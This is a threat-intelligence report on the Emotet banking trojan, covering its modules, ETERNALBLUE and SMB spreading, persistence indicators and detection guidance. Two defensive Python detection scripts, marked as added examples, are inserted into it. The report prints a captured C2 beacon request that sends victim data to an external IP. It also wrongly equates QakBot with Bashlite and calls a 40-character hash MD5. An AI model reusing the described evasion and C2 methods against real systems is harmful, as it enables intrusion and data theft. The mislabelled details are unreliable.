
 

CURRENT INTELLIGENCE REPORT 

Hunting Emotet  
   
Date of information: 11/08/2018

Distribution: SHAREABLE - Can be shared with client and prospects


 
Scope Note: At the customer's request, Recorded Future researched the Emotet downloader and banking trojan to assist incident responders and threat hunters with identifying Emotet infections. Additionally, this report provides a baseline of victimology to determine the targeting practices of Emotet operators. Sources include the Recorded Future platform, VirusTotal, ReversingLabs, Intezer, and VMRay, along with third-party metadata and common OSINT techniques.
 
Executive Summary 
 
Recorded Future assesses that Emotet is a sophisticated malware, offering operators a 
number of evasion techniques, diverse propagation tactics, and methods to generate 
revenue. 
 
● Recorded Future could not find any correlation in victims either geographically or in 
specific industries. Emotet is likely the most popular method of distribution at this 
time, and intends to spread to as many victims as possible without discretion.  
● Many of Emotet’s modules are more conducive to spreading Emotet to other hosts, 
rather than gathering banking information to make a profit. This indicates that 
Emotet operators could be more interested in selling access to infected hosts or to 
the botnet at large to spread other malware, rather than monetizing the infections 
themselves.  
● Emotet commonly abuses legitimate or native Windows tools to gather information, 
or infect further hosts, in an effort to make its behavior difficult to detect. 
● The new email-stealing module elevates Emotet to a more sophisticated class of malware, giving the already stealthy trojan espionage capabilities. A number of recent samples also abused a common code-signing certificate, signaling increased evasion capabilities and the intent to remain undetected.

 
 

Recorded Future | www.recordedfuture.com | RFI-2018-1108 | 1
 
 
Threat Analysis 
 
Background  
 
Emotet is an advanced, modular banking trojan that primarily functions as a downloader or 
dropper of other banking trojans. Emotet operators are not selective about targeting a 
specific industry or region and instead spread without discretion. The malware operators 
appear more interested in leveraging large volumes of infection to generate profit.  
 
Emotet (Intelligence Card) was originally identified as a new banking trojan in 2014 and is often referred to as Geodo. The malware was the product of natural evolution from the Feodo (sometimes called Cridex or Bugat) banking trojan, which spawned other offspring. In the past 12 months, it evolved from a standalone threat into a distributor of other trojans, with numerous large campaigns taking place over the summer of 2018. The malware is unique in that it employs a litany of open source libraries and code, enough to title a folder in its code directory as "Open Source." A number of Emotet modules incorporate utilities developed by Nirsoft to scrape and gather passwords on the victim machine.
 
In the last year, Emotet has been acting as spam-sending malware that infects target systems to then load other malware families onto the host. The infected hosts that distribute spam and occasionally act as proxies for the command and control servers form a decentralized network, making it difficult for defenders to block at their perimeter.
 
Victimology 
 
Recorded Future found no distinct pattern in Emotet targeting, with 22 distinct industries 
being found in victimology of the malware in the last year. Emotet operators have interest 
in selling access to infected hosts or to the botnet at large to spread other malware, rather 
than monetizing the infections themselves. Emotet’s distribution of other malware appears 
to be more targeted geographically, based on the interest of those operators.  
 
Affiliated and Associated Malware 
 
Although Emotet can operate as a standalone banking trojan, its operators often lend its 
spam sending and downloader capabilities to other malware families for distribution. The 
following malware are commonly distributed via Emotet, according to Recorded Future 
data. These trojans are listed in order of their co-occurrences with the Emotet malware 
family.  
 

Figure: Emotet & Associated Malware, via Recorded Future
 
TrickBot 
 
Emotet has been consistently observed delivering the TrickBot (Intelligence Card) banking trojan. Considered to be the successor to the infamous Dyre banking trojan (Intelligence Card), TrickBot leverages multiple attack vectors including redirection attacks and webinjects to attempt to steal information from financial institutions and initiate fraudulent wire transfers. Operators of the Dyre banking trojan were previously associated with an advanced threat campaign dubbed Carbanak that leveraged a variant of malware of the same name to steal data from financial institutions. Over the past two years, the only group of note that Recorded Future has observed utilizing TrickBot is the group of actors known as TA505 (Intelligence Card). The group may have collaborated with Emotet operators to distribute the banking trojans in tandem, according to reports released in July and August 2018 from Palo Alto and Cofense, respectively. TrickBot is continuing to be distributed with Emotet, with the latest observation coming on November 6, 2018 by Malware Traffic Analysis.
 
 
Zeus Panda Banker 
 
Panda Banker (Intelligence Card), a variant of the Zeus banking trojan (Intelligence Card), is delivered using Emotet. The attack appears in the form of a malspam phishing campaign that uses weaponized Microsoft documents that deploy the payload. Zeus Panda used Emotet distribution to target financial institutions and video streaming services in Japan. Other primary targets were organizations from the United States and Canada.
 

IcedID  
 
Researchers with IBM's X-Force team have discovered a new banking trojan, IcedID, which they state first became active in September 2017. IcedID (Intelligence Card) possesses functions similar to those of other well-known and dangerous banking trojans. IcedID has been observed targeting diverse entities in or related to the US finance industry, including banks, payroll divisions, and payment card providers. The malware has additionally targeted mobile service providers, as well as webmail and e-commerce sites. IcedID is spread via malicious spam, dropped by the Emotet trojan. An IcedID campaign observed in late October 2017 used four C2 servers, two of them in Russia, one in Amsterdam, and one in Canada. Combined with the malware's targeting history, we suspect that IcedID's operators are located in Europe or North America, but at the time of this writing have no other indicators to come to a more specific conclusion.
 
Qakbot 
 
QakBot, sometimes called BASHLITE or QBot (Intelligence Card), is malware which primarily infects Linux systems in order to launch DDoS attacks by creating botnets of Internet of Things devices, according to Trend Micro reporting. The victims are mostly residential users, but also gaming platforms and websites. The majority of the attacks are UDP and TCP floods, although HTTP attacks are observed as well. The botnet has been abused by the Lizard Squad threat actor group (Intelligence Card). The malware strain is largely considered a precursor to the much more prolific Mirai malware.
 
Dridex 
 
Dridex (Intelligence Card) was first observed in July 2014, and according to Flashpoint Intelligence, is considered the successor to GameOver ZeuS. Like other banking trojans, Dridex utilizes a peer-to-peer architecture to evade detection or monitoring from law enforcement. The trojan was most active between 2014 and 2015, prior to its heavy distribution via Emotet in 2018.
 
AZORult 
 
The AZORult trojan (Intelligence Card) is a common banking trojan that harvests and exfiltrates data from the compromised system. The malware is commonly peddled on dark web forums, and was previously distributed by exploit kits or malvertising, but was observed being distributed in the Emotet-IcedID campaign in September 2018.
 
 
 

Technical Analysis 
 
Emotet is a sophisticated malware, offering operators a number of evasion techniques, as 
well as different methods of spreading, and a large number of capabilities to generate 
revenue for criminal users. This section will look at tools used for delivery and lateral 
movement to infect hosts, then will address modules of interest, followed by an 
assessment of Emotet’s command and control communications. Finally, technical patterns 
of infection and persistence locations will be discussed, so that defenders may be able to 
identify lurking infections.  
 
This technical information comes from Recorded Future behavioural analysis and inspection of the samples, along with aggregated analysis from US CERT, CERT Polska, Barkly, Kryptos Logic, CheckPoint, Bromium, Fidelis Security, and Malwarebytes.
 
Delivery 
 
Emotet is commonly delivered via malicious spam emails, although it maintains other methods to introduce itself to a victim environment. The email can take multiple forms, most commonly using an attached Word or Excel document to exploit vulnerabilities in Microsoft Office to download Emotet. This includes documents that contain PowerShell commands, exploiting CVE-2017-11882 (Intelligence Card) via poisoned RTF documents, or via an embedded link to a malicious URL. Carbon Black found a campaign from June 2018 that sent Word documents using obfuscated VBScripts that invoke PowerShell commands.
 
The email subjects often center around a requested payment or invoice or a delivery 
notification for tracking shipments. These emails can be sent from spoofed addresses, but 
are often not, relying on volume to generate new infections. The non-use of typosquatted 
domains or email addresses allows Emotet to distance itself from being attached to specific 
infrastructure.  
  
The trojan can propagate laterally via the ETERNALBLUE exploit, which abuses SMB version 1 on a local network to drop and execute further versions of the malware. Additionally, Emotet attempts to enumerate other hosts on the network and brute-force their domain credentials for access. An infected host also becomes part of the spam botnet that is used to spread Emotet via email.
 

Figure: Emotet Infection Chain, via Barkly
 
ETERNALBLUE Propagation 
 
Emotet uses the ETERNALBLUE tool, which is an SMB exploit affecting various Windows 
operating systems from XP to Windows 7, along with deprecated versions of Windows 
servers. The exploit injects shellcode into vulnerable systems, targeting machines by IP 
address and sending the shellcode to the victim over SMB/445, according to a report from 
Fidelis Security. Emotet abuses this exploit to operate as a worm across a local network, to
infect more victim hosts. The ETERNALBLUE module sends an SMB Echo request, and crafts 
the exploit for delivery based on the target architecture. ETERNALBLUE then fingerprints 
the host via its SMB response, and drops the backdoor on the host.  
 
Network Password Scraper & SMB Worm Module 
 
Emotet uses a list of basic credentials to brute-force access to hosts on a local network, again over SMB. This is supplemented by use of the NetPass.exe utility, according to Fidelis Security, which gathers all passwords associated with the current user, including those from network drives. Those credentials are then used to attempt to remotely log in to other hosts. If those connections fail, the module attempts to find writable share drives via SMB that it can then use as infection vectors into hosts that have access to that shared drive.
 

Capabilities & Modules 


 
Anti-Analysis and Evasion 
 
Emotet uses checks to determine if it is being run in a sandboxed environment and will not function if the environment meets the parameters of a typical sandbox. This includes a period where the malware will not run, and Emotet will suspend its operations if it detects monitoring from a virtual machine.
 
Similar to the continuous evolution of Emotet command and control servers, the malware is polymorphic and mutates with each infection to change its hash. This allows Emotet to largely avoid signature-based antivirus detections. This is done by the code changing upon every execution of the malware, while maintaining its core functionality. Additionally, once the main Emotet module is loaded, the malware attempts to update itself to the latest version, to avoid static AV detection.
 
On August 1, 2018, researchers at Kryptos Logic found that a number of Emotet trojan loader samples are signed by a common code signing certificate. This certificate has since been revoked, but the trend of Emotet operators abusing pseudo-legitimate code signing certificates to bypass security controls will likely continue.
 
● Thumbprint: 919368A0286FDAD494A16388C83A571E6B9C285A 
● Serial number: 38 6B C7 CB 6D B4 03 1A 6C DC 2D 67 07 13 B6 1A 
 
Crypter 
 
Emotet is packed, or put into a compressed format, as a method to obfuscate its code and 
evade detection. This effort utilizes a crypter to protect itself from detection and make 
reverse engineering efforts more complicated. Thus, much of the observed code from 
when the sample is packed is built to unpack the sample upon execution. Recorded Future 
could not identify the crypter or packer used to compress Emotet at the time of analysis.  
 
Main Module - Malware Dropper 
 
The module that makes up the base Emotet payload provides the initial backdoor into a victim system. Emotet communicates the victim system data to its command and control, with data including username, operating system version, and a list of running processes. The list of command and control IPs is hardcoded into each sample of malware, and these are called upon to download the other modules. This module is also used to download the other malware families previously described.
 

These additional modules are downloaded as obfuscated DLLs, using an XOR cipher to hide incriminating strings as the module is downloaded or scanned. Often, the modules are based on open source tools to scrape data from the victim's machine, including email data, passwords used in web browsing, and credentials used on the host for other activities. These modules generally seem more interested in spreading Emotet to further hosts than in gathering banking information to make a profit. This indicates that Emotet operators have interest in selling access to infected hosts or to the botnet at large to spread other malware, rather than monetizing the infections themselves.
 
Email Stealing Module 
 
On October 31, 2018, researchers from Kryptos Logic found that the Emotet downloader 
and banking trojan now has the ability to exfiltrate emails from victim systems. This is an 
evolution of Emotet’s abuse of the Outlook Messaging API, which was used to pilfer lists of 
the victim’s contacts. The module, contained in mapi32.dll, accesses 
HKLM\Software\Clients\Mail\Microsoft Outlook. The only observed sample of this module 
has an MD5 hash value of 6cd44f2d00b43d80c08922d99d51cce804a59a54.  

 
Figure: Emotet Email Harvesting Mechanism, via Kryptos Logic
 

The upgraded malware accesses the Outlook registry key to scrape email addresses, email 
subjects, and the contents of the email from the interpersonal message (IPM) root folder. 
This data is then written to a temporary file and encoded into Base64. This information is 
then exfiltrated to the Emotet C2 via HTTP on an API call from the WinINet API.  
 
Emotet abuses Nirsoft's Mail PassView, a pseudo-legitimate utility which identifies email addresses, passwords, and contact lists from common email clients, including Outlook, but also Gmail, Hotmail, and Thunderbird. This is still used to scrape email clients other than Outlook, to supplement the spam-sending capability.
 
Spam Module 
 
The spam sending module of Emotet relies on the email stealing and harvesting modules 
to create lists of further targets for sending spam. The module pulls in local data to 
supplement data sent from the command and control that includes the message template, 
subject line, a list of recipients, and list of hijacked accounts, which are used for the spam 
distribution. The spam is not sent directly from the local host, but from a repository of 
previously scraped email accounts that are remotely logged into to send the spam emails. 
 
Browser Password Stealer & Banking Module 
 
Emotet has used WebBrowserPassView, another password recovery tool made by Nirsoft, 
that captures passwords stored by Chrome, Internet Explorer, Firefox, Safari, and Opera. 
These target a variety of services for data mining, including bank account and email 
information, but also social media and other common login data. This module contains 
similar functions to the Graftor browser password stealer (Intelligence Card), which also
abuses WebBrowserPassView.  
 

Figure: Example of WebBrowserPassView, via CheckPoint
 
Previous samples of Emotet invoked a banking module, which intercepts network traffic
from the browser to steal banking details entered by the user, used in combination with 
the stolen browser passwords. This module operated as a man-in-the-browser attack, 
sniffing network activity to scrape passwords related to banking activity. CERT Polska found 
this module was occasionally used to automatically steal funds from victimized bank 
accounts using Automated Transfer Systems (ATS).  
 
 
Module                      File Name                           File Hash (SHA256)
Email Stealer               mapi32.dll                          1be50fc25a29f09cf47ed6e00311b487f6f0d187db473b2bf29cd94d58ffa38e (Intelligence Card)
Email Harvester             email_address_harvester.dll         d4491f9b885bba06d7ee6e02e6e71272893638bbb92f2c23b9ddf52f8a26a702 (Intelligence Card)
Spam Module                 spam.dll                            d7efad30d0a56983fba15f0be28877bd7d55c723388005baa322b94c02540f11 (Intelligence Card)
Browser Credential Stealer  web_browser_credential_stealer.dll  86cf916c547b6f228b8e7bd4667715db0467c3d141f6226e27025797aeca10ec (Intelligence Card)
Connection Verifier         connection_verifier.dll             022a5dfe18ee332c020a245cac64f4aa4fc5dd528f79923d00d8ffe376fc76da (Intelligence Card)

 
 
 

Command and Control Communications 


 
Emotet consistently cycles through its command and control infrastructure, making it 
difficult to block or detect based on network traffic. Oddly, command and control IPs are 
generally hardcoded into the main Emotet dropper module, as is the command and control 
public RSA key. This may indicate it is easier for operators to upload or update the trojan 
software to cycle out IP addresses, than to rely on DNS names via domain generating 
algorithm (DGA). It is unclear if this is the case.  
 
Similar to other aspects of the trojan, Emotet abuses a third-party service to fabricate its command and control communications; in this case, Google's Protocol Buffers (Protobuf) was used to build its C2 architecture. The trojan also built its encryption over OpenSSL, leading CheckPoint researchers to call it "over-engineered." CheckPoint, discussing C2 connections, further stated:
 
Communication is encrypted with a randomly-generated AES key, which is encrypted 
using the server public key and appended to the message. This protocol is unusually 
cryptographically sound and even a person with full access to the malware sample and a 
traffic log will be unable to recover the original communication, unless the original 
process that spawned the AES key is still running. 
 
Communication to the download sites for the main payload or additional modules occurs over normal HTTP; however, without making a prior DNS query to the download site. Using a GET request, victim data is sent in the Cookie header of the HTTP request, seen below. The cookie's key is a random 16-bit hexadecimal number, with a Base64-encoded binary blob as the value.
 
GET / HTTP/1.1 
Cookie: 
DD29=e8fd7YpIy2Ui+U7bz1/cQD9bH4KHshzaN2SpKoPEnC1D85K4Zrwdb6dBoHoDC5GgvcgecLN20kpk1lQxus
6AJEiutWK4hBSWFbQUmtyr3LxI+/3MFdKn1lo7nWyEw+sCzKL6y34njzJwoDwd3I5BJD0NqUL+iEnbB1EWXQhxcX
ihFeFS+TlRsuMxOl3Xmyo2p0FuHX+hyGoO19dzLpEMK1LhXGkCkha+kPGFqfxECUoQndFLiMRgXAj4Omw/Ywc6
Ba+9d5fyZNLEKbtkxsfO3KmQSLoE4TkITRri1kSMCqnNlb7PTroCQmoJvRHBiEGla6VzgmCQ5tsspBIuaWc2ct9hX
9c4SLZbTnW6mPjLIh4VeDJ7gNpwhedyLHcnr3GWjILLwFPk7RmgHglXXI2qEOXcwbRhtaNuI8RrkMQj37Rov147w
EGBtt+GlQR9/9oFXoBXH9f6m5K4ULP3CEnDGGJVEtfkgt7yZ082wAIfVzow1szvMF4bF7MFaCPbHA9hygyf9Uc8G
wDjM4CndFxUwROWmEgQKjIk24PIj5Y+oz4jF 
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322) 
Host: 206.214.220.79:8080 
Connection: Keep-Alive 
Cache-Control: no-cache 

 
The data in the cookie header is constructed using Google's Protobuf, which includes the encrypted RSA key for the command and control, followed by a hash of the data being sent, then followed by the encrypted data itself. Unfortunately, this elaborate encryption scheme and message structure make it difficult to detect the network traffic of Emotet infections. Where possible, Recorded Future recommends monitoring for HTTP traffic that does not involve a domain name or referrer, and filtering those requests by large cookie headers, to potentially identify a victim in the environment.
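As an added example (not part of the report), the following Python script applies the hunting heuristic just described to raw HTTP requests: a GET to an IP-literal Host (so no DNS lookup precedes it), no Referer, and a single Cookie whose key is a 16-bit hex value and whose value is a large Base64 blob. The two sample requests, the 192.0.2.0/24 address and the 256-byte size threshold are constructed assumptions, not captures from the report.

```python
import base64
import ipaddress
import re
from dataclasses import dataclass, field

# Traits of the Emotet C2 request shown in the report: GET to an IP-literal
# Host (no DNS query precedes it), no Referer, and one Cookie whose key is a
# random 16-bit hex value carrying a Base64-encoded binary blob.
COOKIE_KEY_RE = re.compile(r"^[0-9A-Fa-f]{4}$")
MIN_BLOB_BYTES = 256  # assumed threshold for a "large" cookie payload; tune per environment


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, lower-cased header dict)."""
    lines = [ln.rstrip("\r") for ln in raw.strip().splitlines()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        if not ln.strip():
            break  # end of headers
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_ip_literal(host: str) -> bool:
    """True when Host is a bare IPv4 address or bracketed IPv6, optionally with :port."""
    host = host.strip()
    if host.startswith("["):
        host = host[1:host.index("]")]
    elif re.search(r":\d+$", host):
        host = host.rsplit(":", 1)[0]  # strip the port from an IPv4 host
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def base64_payload_size(value: str) -> int:
    """Decoded size of a strict Base64 string, or -1 if it is not valid Base64."""
    try:
        return len(base64.b64decode(value, validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        return -1


def assess_request(raw: str) -> Verdict:
    """Flag a request only when all three report-derived traits are present."""
    method, _path, headers = parse_request(raw)
    reasons = []
    if method == "GET" and is_ip_literal(headers.get("host", "")):
        reasons.append("GET to an IP-literal Host (no DNS resolution involved)")
    if "referer" not in headers:
        reasons.append("no Referer header")
    key, sep, value = headers.get("cookie", "").partition("=")
    if sep and COOKIE_KEY_RE.match(key) and ";" not in value:
        size = base64_payload_size(value)
        if size >= MIN_BLOB_BYTES:
            reasons.append(f"single cookie {key}= carries a {size}-byte Base64 blob")
    return Verdict(suspicious=len(reasons) == 3, reasons=reasons)


# Constructed sample traffic (not captures from the report). The beacon mimics
# the report's request shape with a documentation-range IP and a synthetic blob.
_BLOB = base64.b64encode(bytes(range(256)) + b"constructed-emotet-style-payload").decode()
BEACON_REQUEST = (
    "GET / HTTP/1.1\r\n"
    f"Cookie: DD29={_BLOB}\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)\r\n"
    "Host: 192.0.2.10:8080\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Referer: https://www.example.com/\r\n"
    "Cookie: session=abc123; theme=dark\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("beacon", BEACON_REQUEST), ("benign", BENIGN_REQUEST)):
        verdict = assess_request(req)
        print(name, "suspicious" if verdict.suspicious else "ok", verdict.reasons)
```

Requiring all three traits keeps ordinary traffic to IP-addressed hosts (CDNs, internal services) from being flagged on the Host check alone.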
 
However, despite Emotet’s intensive and clandestine communications, the use of the 
ETERNALBLUE exploit may aid defenders in identifying infected hosts if they begin 
exhibiting behavior to enumerate other hosts or sending SMB echo requests to other hosts 
on the NAT. This method of detection may well provide a better early warning for 
defenders, as later network activity does its best to not stand out in network traffic logs.  
 
Persistence Locations 
 
File Locations 
 
Emotet typically drops files into the AppData\Local or AppData\Roaming directories. These files are either randomly named or disguised with names mimicking media executables, such as wmplayer.exe. Emotet attempts to gain administrative privileges in the Windows system root directories, allowing the malware to run in disguise as a Windows service. Researchers from TrendMicro note that Emotet drops its files into AppData\Local\Microsoft\Windows or AppData\Roaming if the trojan gains administrative privileges, and into the System folder if it cannot escalate privileges.
 
Examples of the dropped file paths:  
 
 
C:\Users\<username>\AppData\Local\Microsoft\Windows\shedaudio.exe
C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe

 
The fake services often reuse the descriptions of the real services they mimic; however, Emotet has yet to provide a publisher. The lack of a publisher and odd timestamps may assist operators in identifying Emotet-created services. Operators can identify created services via Windows event logs, searching for event ID 7045.
 
   

In behavioural analysis of recent samples of Emotet, Recorded Future found the following directory was created:

directory_created: C:\Users\<username>\AppData\Local\Microsoft\Windows\Caches

 
 
Registry Modifications 
 
Emotet creates a registry key to gain persistence on the victim host, which allows the malware to be executed upon startup. Recently, these keys have been placed under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\, while a subkey is generated if the malware has gained administrative access. The subkey is typically located in HKLM\SYSTEM\ControlSet001\services\. Defenders can assess the maliciousness of any files that are configured to execute upon startup with time-based analysis, looking for anomalies or files that stand out. Registry modifications can be tracked in Windows event logs under event ID 4657.
  
Further examples of registry keys created by Emotet: 
 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 
 
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run 
 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 

 
Scheduled Tasks 
  
While Emotet does not currently use scheduled tasks to achieve persistence on the host, 
many of the malware it drops (Trickbot, Dridex, etc.) do use it as a persistence method. 
Identifying these infections may lead to discovery of an Emotet infection.  
 
Operators can hunt for newly scheduled tasks in Windows event logs for instances of event 
ID 4698. Alternatively, the tools Autoruns and Task Scheduler can also be used on each 
host that is being inspected.  
 
Behavioural Analysis 
 

In behavioural analysis of recent samples of Emotet, Recorded Future found the following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\Reason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-26-ad-7a\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{945a8954-c147-4acd-923f-40c45405a658}.check.42\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-26-ad-7a\WpadDecisionTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\Reason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{02B68A4B-B854-4981-A220-4267CF5CCD65}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{02B68A4B-B854-4981-A220-4267CF5CCD65}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{02B68A4B-B854-4981-A220-4267CF5CCD65}\WpadDecisionReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\ID
HKEY_CURRENT_USER\Local Settings\MuiCache\33\52C64B7E\LanguageList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\Scope

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-26-ad-7a\WpadDecision
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\{3695FB67-53B6-4D5C-B45C-1D6BB3C3C485}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{02B68A4B-B854-4981-A220-4267CF5CCD65}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-26-ad-7a\WpadDecisionReason
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The same samples deleted the following registry keys:

HKEY_CURRENT_USER\System\CurrentControlSet\Control\Network\ShowWirelessConnectingOnStart
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-26-ad-7a\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{02B68A4B-B854-4981-A220-4267CF5CCD65}\WpadDetectedUrl

Additional directories, commands and mutexes:

command_line:
C:\Windows\SysWOW64\nlawatch.exe
\C:\Program Files\Windows Media Player\wmpnscfg.exe\

mutex:
Global\MEC7B5BB7
Global\IEC7B5BB7

directory_created:
C:\Users\<username>\AppData\Local\Microsoft\Windows\Caches

Remediation & Detection 


 
Identify Emotet-created Services, Registry Modifications, or Scheduled Tasks 
 
● Operators can identify created services via Windows event logs, searching for event 
ID 7045, looking for services that do not list a publisher or have odd timestamps. 
 
● Defenders can track registry modifications by looking for Windows event ID 4657 
host logs. 
 
● Operators can hunt for newly scheduled tasks in Windows event logs for instances 
of event ID 4698. Alternatively, the tools Autoruns and Task Scheduler can also be 
used on each host that is being inspected.  
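As an added example (not from the report), the following Python triage routine scores autorun-style records, of the kind a hunter exports from Autoruns, Run-key enumeration or event ID 7045, against the host indicators this report describes: images under AppData\Local or AppData\Roaming, file names matching the dropped executables listed earlier running outside their expected directories, services with no publisher, and entries created after a known-good baseline snapshot. The record schema, the sample entries, the baseline time and the expected-directory mapping are constructed assumptions.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional


# Constructed record shape, roughly what a hunter exports from Autoruns or
# builds from Event ID 7045 (service installed) / Run-key enumeration.
@dataclass
class AutorunEntry:
    source: str              # e.g. "HKCU\\...\\Run", "HKLM\\...\\Run", "Service"
    name: str
    image_path: str
    publisher: Optional[str]
    created: datetime


# Indicators taken from the report's persistence section.
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Local|Roaming)\\", re.IGNORECASE)
# File names the report lists as dropped by Emotet. The directory is where the
# genuine executable of that name lives (assumed baseline); None means there is
# no legitimate counterpart, so any occurrence is reported.
REPORTED_NAMES = {
    "wmplayer.exe": r"c:\program files\windows media player",
    "wmpnscfg.exe": r"c:\program files\windows media player",
    "flashplayer.exe": None,
    "shedaudio.exe": None,
    "nlawatch.exe": None,
}


def score_entry(entry: AutorunEntry, baseline: datetime) -> List[str]:
    """Return the report indicators an entry matches (empty list = nothing odd)."""
    findings = []
    path = entry.image_path.strip('"')
    folder, _, exe = path.rpartition("\\")
    exe, folder = exe.lower(), folder.lower()
    if USER_WRITABLE_RE.search(path):
        findings.append("image under AppData\\Local or AppData\\Roaming (user-writable)")
    if exe in REPORTED_NAMES and folder != REPORTED_NAMES[exe]:
        findings.append(f"{exe} is a name seen in Emotet drops, running from {folder or '(no dir)'}")
    if entry.source.lower() == "service" and not entry.publisher:
        findings.append("service installed with no publisher (event ID 7045 candidate)")
    if entry.created > baseline:
        findings.append(f"created {entry.created:%Y-%m-%d %H:%M}, after the baseline snapshot")
    return findings


def triage(entries: List[AutorunEntry], baseline: datetime) -> Dict[str, List[str]]:
    """Map entry name -> findings for every entry with at least one indicator, worst first."""
    scored = {e.name: score_entry(e, baseline) for e in entries}
    hits = {name: f for name, f in scored.items() if f}
    return dict(sorted(hits.items(), key=lambda kv: len(kv[1]), reverse=True))


# Constructed sample records (not from a real host).
BASELINE = datetime(2018, 11, 1, 0, 0)
SAMPLE_ENTRIES = [
    AutorunEntry("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "shedaudio",
                 r"C:\Users\alice\AppData\Local\Microsoft\Windows\shedaudio.exe",
                 None, datetime(2018, 11, 7, 3, 12)),
    AutorunEntry("Service", "nlawatch", r"C:\Windows\SysWOW64\nlawatch.exe",
                 None, datetime(2018, 11, 7, 3, 13)),
    AutorunEntry("Service", "WMPNetworkSvc",
                 r"C:\Program Files\Windows Media Player\wmpnetwk.exe",
                 "Microsoft Windows", datetime(2018, 3, 1, 9, 0)),
    AutorunEntry("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "wmplayer",
                 r"C:\Users\alice\AppData\Roaming\wmplayer.exe",
                 "Microsoft Windows", datetime(2018, 10, 15, 14, 0)),
]

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_ENTRIES, BASELINE).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```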
 
Identify Emotet via Network or Host Based Detections 
 
● Using the YARA rules found in Appendix A, defenders can scan inbound emails or endpoint devices for files that match signatures typically used by Emotet. This includes some of the malicious spam documents and Emotet modules. These YARA rules were derived from public YARA repositories and are credited to their authors in the meta field of each rule.

● Using the Snort signatures found in Appendix B, defenders can potentially identify hosts that are attempting whoami lookups from Emotet, or similar traffic from the co-distributed IcedID banking trojan. These Snort signatures were developed by Lenny Hansson via seclists.com.
 
Monitor for Emotet Spreading or C2 Communication  
 
● By monitoring for use of SMB on TCP port 445, defenders can identify use of the ETERNALBLUE exploit. This may help detect infected hosts that attempt to enumerate other hosts or send SMB echo requests to other hosts on the NAT.

